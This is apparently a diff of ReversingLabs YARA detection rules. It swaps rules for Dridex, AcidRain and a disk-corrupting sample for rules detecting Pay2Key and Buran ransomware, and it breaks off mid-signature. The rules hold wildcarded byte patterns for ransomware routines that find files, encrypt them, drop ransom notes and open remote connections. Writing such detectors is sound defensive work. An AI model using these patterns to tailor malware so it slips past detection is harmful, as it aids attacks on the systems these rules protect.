-            ?? FF 75 ?? FF 75 ?? 57 53 FF 55 ?? 8B 55 ?? 8B 4D ?? 8B 45 ?? 41 05 ?? ?? ?? ?? 89
-            4D ?? 89 45 ?? 3B 4E ?? 0F 82 ?? ?? ?? ?? 8B 7D ?? EB ?? FF 15 ?? ?? ?? ?? 33 FF 85
-            DB 74 ?? 83 FB ?? 74 ?? 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 85 F6 74 ?? 56 6A ??
-            FF D3 8B 35 ?? ?? ?? ?? 50 FF D6 EB ?? FF 15 ?? ?? ?? ?? 8B 7D ?? EB ?? 33 C0 5F 5E
-            5B 8B E5 5D C2 ?? ?? 8B 35 ?? ?? ?? ?? 85 FF 74 ?? 57 6A ?? FF D3 50 FF D6 8B 45 ??
-            5F 5E 5B 8B E5 5D C2
+		$exclude_directories_and_drop_ransom_note = {
+            8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 8D ?? ??
+            ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 95 ??
+            ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 8D
+            8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9 ??
+            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? E9
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 75 ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B
+            55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ??
+            ?? ?? 89 8D ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A
+            ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D
+            4D ?? E8 ?? ?? ?? ?? EB ?? B8
+        }
+		$drop_ransom_note_no_dir_exclusion = {
+            8D 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? C6 45 ?? ?? 68 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 88 85 ?? ?? ?? ?? 33 C9 88 8D ?? ??
+            ?? ?? 33 D2 88 95 ?? ?? ?? ?? 0F B6 85 ?? ?? ?? ?? 50 0F B6 8D ?? ?? ?? ?? 51 0F B6
+            95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 E8 ?? ?? ?? ??
+            50 8B 4B ?? 51 8D 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ??
+            6A ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15
+            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B
+            5D ?? B8 ?? ?? ?? ?? C3 C7 45
+        }
+		$find_files_p1 = {
+            8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 4D ?? 8B 55 ?? 53
+            57 8B 7D ?? 89 95 ?? ?? ?? ?? 3B CF 74 ?? 8A 01 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 74 ??
+            51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8B 95 ?? ?? ?? ?? 8A 01 88 85 ?? ?? ??
+            ?? 3C ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 52 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
+            ?? ?? ?? 8A 85 ?? ?? ?? ?? 33 DB 3C ?? 74 ?? 3C ?? 74 ?? 3C ?? 8A C3 75 ?? B0 ?? 2B
+            CF 0F B6 C0 41 89 9D ?? ?? ?? ?? F7 D8 89 9D ?? ?? ?? ?? 56 1B C0 89 9D ?? ?? ?? ??
+            23 C1 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? F7 D8
+        }
+		$find_files_p2 = {
+            1B C0 53 53 53 51 F7 D0 23 85 ?? ?? ?? ?? 53 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75
+            ?? FF B5 ?? ?? ?? ?? 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 E9 ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? F7 D8 1B C0 F7 D0 23 85 ?? ?? ?? ?? 80 38 ?? 75 ?? 8A 48 ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 58 ?? 74 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 57 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85 C0 75 ?? 38 9D ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8 ?? 3B C8 74 ?? 68 ??
+            ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 38 9D ?? ?? ?? ??
+            74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 8B D8 56 FF 15 ?? ?? ??
+            ?? 80 BD ?? ?? ?? ?? ?? 5E 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B C3 8B 4D ??
+            5F 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 53 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 50 8D 45
+            ?? 64 A3 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4B ?? 51
+            FF 15 ?? ?? ?? ?? 83 E0 ?? 74 ?? 8B 53 ?? 52 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 8B 43 ??
+            50 FF 15 ?? ?? ?? ?? 8B 4B ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 53
+            ?? 52 8D 45 ?? 50 83 EC ?? 8B CC 89 A5 ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? C6 45 ?? ?? 8D 55 ?? 52 8B 43 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45
+            ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 43 ?? 50 8D
+            4D ?? 51 83 EC ?? 8B D4 89 A5 ?? ?? ?? ?? 52 8B 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 8B 43 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ??
+            C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 8B 4D ??
+            33 CD E8 ?? ?? ?? ?? 8B E5 5D 8B E3 5B C2
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $corrupt_physical_drive )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( ( $exclude_directories_and_drop_ransom_note ) or ( $drop_ransom_note_no_dir_exclusion ) )
 }
-rule REVERSINGLABS_Win32_Trojan_Dridex : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Pay2Key : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Dridex trojan."
+		description = "Yara rule that detects Pay2Key ransomware."
 		author = "ReversingLabs"
-		id = "bc68aca1-69e6-57e6-9277-70c89fda1e5d"
-		date = "2020-06-26"
-		modified = "2020-09-16"
+		id = "2e482222-0483-5fe3-bb87-cfadda8e7e7a"
+		date = "2021-04-14"
+		modified = "2021-04-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.Dridex.yara#L1-L80"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Pay2Key.yara#L1-L99"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7eddc8f33846dfb61302b7d7fddd8dec59a1bde05b14135c14131a02e2c19600"
+		logic_hash = "2497504f3afc99523cb29e51652a24f4374316d57d4baf5cde8d22e75a425585"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "Dridex"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Pay2Key"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$resolve_api_wrapper_1 = {
-            56 57 8B FA 8B F1 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FE ?? ?? ?? ?? 75 ?? 33 C0 5F
-            5E C3 8B CE E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 8B CE E8 ??
-            ?? ?? ?? 85 C0 74 ?? 8B D7 ?? ?? ?? ?? E9
-        }
-		$resolve_api_wrapper_2 = {
-            57 53 8B FA 8B D9 8B CF E8 ?? ?? ?? ?? 85 C0 75 ?? 81 FB ?? ?? ?? ?? 74 ?? 8B CB E8
-            ?? ?? ?? ?? 85 C0 74 ?? 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3 8B CB E8 ?? ?? ?? ?? 84
-            C0 74 ?? 8B CB E8 ?? ?? ?? ?? 85 C0 75 ?? 33 C0 EB
-        }
-		$resolve_api_wrapper_3 = {
-            55 8B EC 57 8B 7D ?? 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74
-            ?? 56 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ??
-            85 C0 75 ?? 5E 33 C0 5F 5D C2 ?? ?? 57 50 E8 ?? ?? ?? ?? 5E 5F 5D C2
-        }
-		$resolve_api_wrapper_4 = {
-            55 8B EC FF 75 ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 56 8B 75 ?? 81 FE ?? ?? ?? ?? 74 ?? 56
-            E8 ?? ?? ?? ?? 85 C0 75 ?? 8B CE E8 ?? ?? ?? ?? 84 C0 74 ?? 56 E8 ?? ?? ?? ?? 85 C0
-            74 ?? 5E 89 45 ?? 5D E9
-        }
-		$find_first_file_snippet_1 = {
-            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? [4-6] BA ??
-            ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A ?? 8D 56 ??
-            52 53 51 FF D0
+		$find_files = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ??
+            41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ??
+            ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ??
+            56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50
+            50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5
+            89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41
+            F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
+            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
+            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
+            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
+            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
+            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
+            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
+            ?? E9
         }
-		$find_first_file_snippet_2 = {
-            57 53 55 8B E9 33 C9 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 8B 18 E8 ?? ?? ?? ?? 8B C8 85 C9 74 ?? 33 D2 83 FB ?? 6A ?? 5B 8D 7D ?? 0F 4C DA
-            8B C2 53 52 52 57 0F 9D C0 50 FF 75 ?? FF D1
+		$encrypt_files = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ??
+            33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            8B 43 ?? 2B 43 ?? 75 ?? 8B 75 ?? 8B 45 ?? 8B 4D ?? C7 45 ?? ?? ?? ?? ?? 89 06 89 4E
+            ?? 8B 4D ?? 89 4E ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? 83 7B ?? ?? 74
+            ?? 8B 45 ?? 2B 45 ?? 50 E8 ?? ?? ?? ?? 8B 75 ?? 8B F8 8B 55 ?? 2B F2 56 52 57 E8 ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
+            56 89 75 ?? E8 ?? ?? ?? ?? 56 57 50 89 45 ?? E8 ?? ?? ?? ?? 8B 75 ?? 8D 45 ?? 83 C4
+            ?? 50 56 6A ?? 6A ?? 6A ?? FF 73 ?? FF 15 ?? ?? ?? ?? 8D 4D ?? 85 C0 75 ?? 8B 75 ??
+            89 45 ?? 89 45 ?? 89 45 ?? 89 06 89 46 ?? 89 46 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ??
+            ?? ?? 8B C6 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 ?? ?? FF 75 ?? E8
+            ?? ?? ?? ?? FF 75 ?? 56 8B 75 ?? 56 E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 8B 4D ?? 8B 45
+            ?? C7 45 ?? ?? ?? ?? ?? 89 4F ?? 8D 4D ?? 89 37 89 47 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C7 8B 4D ?? 64 89 0D ?? ??
+            ?? ?? 59 5F 5E 5B 8B E5 5D C2
         }
-		$find_first_file_snippet_3 = {
-            53 56 8B F1 33 DB 57 32 C9 89 5E ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
-            38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 6A ?? 33 C0 83 FF ?? 59 0F 4C C8 8D 46 ?? 51 53
-            53 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
+		$remote_connection_p1 = {
+            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? C7
+            45 ?? ?? ?? ?? ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 6A ?? 56 57 FF 15 ?? ?? ?? ??
+            8B 75 ?? 8B C8 8B D6 E8 ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? 8B CE
+            E8 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ?? 68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB
+            ?? 81 F9 ?? ?? ?? ?? 74 ?? 81 F9 ?? ?? ?? ?? 74 ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5
+            5D C3
         }
-		$find_first_file_snippet_4 = {
-            53 56 8B F1 57 33 DB 32 C9 89 5E ?? 33 FF E8 ?? ?? ?? ?? 83 38 ?? 7C ?? 8D 7B ?? 8D
-            5F ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 4E ?? 57 6A ?? 6A
-            ?? 8D 56 ?? 52 53 51 CC C3
+		$remote_connection_p2 = {
+            55 8B EC 51 53 56 8B F1 57 8B 46 ?? 83 C0 ?? 50 FF 15 ?? ?? ?? ?? 80 7D ?? ?? 6A ??
+            74 ?? 8B 4E ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 45 ?? 8B 08
+            83 F9 ?? 75 ?? 8B 4E ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ??
+            ?? 8B 45 ?? 8B 7D ?? 57 89 45 ?? 8D 45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75
+            ?? FF 75 ?? 51 FF 15 ?? ?? ?? ?? 8B D8 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? B8 ?? ?? ??
+            ?? EB ?? 3D ?? ?? ?? ?? B9 ?? ?? ?? ?? 0F 44 C1 85 DB 74 ?? 3D ?? ?? ?? ?? 74 ?? FF
+            75 ?? 8B 4E ?? 50 57 E8 ?? ?? ?? ?? 5F 5E 5B 59 5D C2 ?? ?? 8B 4E ?? 57 E8 ?? ?? ??
+            ?? 5F 5E 5B 59 5D C2
         }
-		$find_first_file_snippet_5 = {
-            56 8B F1 32 C9 57 C7 46 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            8B 38 E8 ?? ?? ?? ?? 8B D0 85 D2 74 ?? 33 C0 B9 ?? ?? ?? ?? 83 FF ?? 0F 4C C8 51 50
-            50 8D 46 ?? 50 33 C0 83 FF ?? 0F 9D C0 50 FF 76 ?? FF D2
+		$remote_connection_p3 = {
+            55 8B EC 83 EC ?? 56 57 6A ?? 8B F2 8B F9 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 45
+            ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 56 57 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B C8 8B D6 E8
+            ?? ?? ?? ?? 8B 0E 8B F8 83 F9 ?? 75 ?? 68 ?? ?? ?? ?? EB ?? 81 F9 ?? ?? ?? ?? 75 ??
+            68 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 FF 74 ?? 5F 83 C8 ?? 5E 8B E5 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( any of ( $resolve_api_wrapper_* ) and any of ( $find_first_file_snippet_* ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Linux_Trojan_Acidrain : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Buran : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects AcidRain trojan."
+		description = "Yara rule that detects Buran ransomware."
 		author = "ReversingLabs"
-		id = "802c7eb7-d407-5b07-a6b4-4648d3ad80e9"
-		date = "2024-05-10"
-		modified = "2024-05-10"
+		id = "c2a36a8b-5c21-5c31-994d-b424c038dd21"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Linux.Trojan.AcidRain.yara#L1-L67"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Buran.yara#L1-L91"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5b47a0de8bda09d217f8a148e561f3da7ce4945f011f4a9b5dbbca88157d3080"
+		logic_hash = "5606e0acecd99ccf2feaa995353211302903a09bb2c4ec65903566215e2d5ca4"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "AcidRain"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Buran"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$destroy_files_using_ioctls = {
-            55 89 E5 57 BF ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 7C 24 ?? 8B 45 ?? 89 04 24 E8
-            ?? ?? ?? ?? 85 C0 89 C3 78 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ??
-            8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 81 C4 ?? ?? ?? ?? 5B 5E 5F 5D
-            C3 8D 45 ?? BE ?? ?? ?? ?? 89 44 24 ?? 89 74 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 4D ??
-            8B 55 ?? C7 45 ?? ?? ?? ?? ?? 85 C9 89 55 ?? 74 ?? 8D 75 ?? 8D B6 ?? ?? ?? ?? 8D BF
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 89 74 24 ?? 89 44 24 ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 01 D0 39 45
-            ?? 89 45 ?? 77 ?? 81 FA ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 45 ?? C7 45
-            ?? ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 75 ?? EB ?? 31 C9 89 4C 24 ?? 8B 45 ?? 89
-            1C 24 89 44 24 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 89 7C 24 ?? 89 1C 24 89 44 24 ?? E8
-            ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 01 D0 39 45 ?? 89 45 ?? 76 ?? B8 ?? ?? ?? ?? 89 74 24
